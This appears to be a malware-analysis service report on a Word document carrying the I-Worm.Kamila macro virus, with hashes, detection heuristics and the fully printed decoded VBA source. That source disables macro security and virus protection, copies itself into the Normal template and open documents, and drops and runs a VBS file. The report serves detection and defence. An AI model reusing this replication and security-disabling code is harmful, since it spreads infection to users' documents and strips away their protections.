I-Worm.Kamila — Office (OLE) malware analysis

Static analysis result for SHA-256 7362a920526f7b9f…

MALICIOUS

Office (OLE)

39.5 KB Created: 2003-01-03 13:56:00 Authoring application: Microsoft Word 10.0 First seen: 2015-10-01
MD5: af4a09e18327b38b342f3c99eb727f40 SHA-1: 85818919c573bd8245df46433229b4754e4a5e0b SHA-256: 7362a920526f7b9feccb840fb7e9a4c1d9609812ca5cf8741ffb3671dccbde4b
388 Risk Score

Malware Insights

I-Worm.Kamila · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1553.005 Security Software Installation

The sample is a malicious Word document containing VBA macros. The Document_Open macro attempts to disable Word's macro security settings by writing to the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level. It also attempts to replicate its VBA code to the Normal template and the active document, and self-identifies as 'I-Worm.Kamila'.

Heuristics 8

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set wsh = CreateObject("WScript.Shell")
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set wsh = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3029 bytes
SHA-256: 53ad4974cc9cadf54aac2c2075150c0607319507a54b9be6628d72ac2be4629e
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'I-Worm.Kamila

Private Sub Document_Open()
    On Error Resume Next
    If ThisDocument.Type = wdTypeDocument And KamExTemp Then Exit Sub
    If ThisDocument.Type = wdTypeTemplate And KamExDoc Then Exit Sub
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "I-Worm.Kamila"
        .Subject = "I-Worm.Kamila"
        .Comments = "Generated by I-Worm.Kamila"
        .Execute
    End With
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

   With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    ActiveDocument.ReadOnlyRecommended = False
    If KamExDoc And KamExTemp Then Exit Sub

    If KamExDoc Then
        ActiveDocument.VBProject.VBComponents("ThisDocument").Export "C:\kama.dll"
        NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\kama.dll"
        NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 4
    ElseIf KamExTemp Then
        NormalTemplate.VBProject.VBComponents("ThisDocument").Export "C:\kama.dll"
        ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\kama.dll"
        ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 4
    End If
    Kill "C:\kama.dll"
    ActiveDocument.Save
    NormalTemplate.Save
    DropWorm
End Sub

Private Sub Document_Close()
    Document_Open
End Sub

Private Function KamExDoc() As Boolean
    On Error Resume Next
    str1 = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 1)
    KamExDoc = (str1 = "'I-Worm.Kamila")
End Function

Private Function KamExTemp() As Boolean
    On Error Resume Next
    str1 = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 1)
    KamExTemp = (str1 = "'I-Worm.Kamila")
End Function

Private Sub DropWorm()
    On Error Resume Next
    Dim blYes As Boolean
    Dim wsh As Object
    blYes = False
    Open "C:\kam_drop.vbs" For Output As #1
    For i = 1 To ThisDocument.VBProject.VBComponents("ThisDocument").CodeModule.CountOfLines
        str1 = ThisDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(i, 1)
        If str1 = "'<BODY>" Then
            blYes = True
            str1 = ""
        ElseIf str1 = "'</BODY>" Then
            blYes = False
        End If
        If blYes Then
            Print #1, Right(str1, Len(str1) - 1) & vbCrLf
        End If
    Next i
    Set wsh = CreateObject("WScript.Shell")
    Close #1
    wsh.Run "C:\kam_drop.vbs"
    Set wsh = Nothing
End Sub


'<BODY>
'MsgBox "I"
'</BODY>

Open this report in the interactive analyzer, or submit your own file for analysis.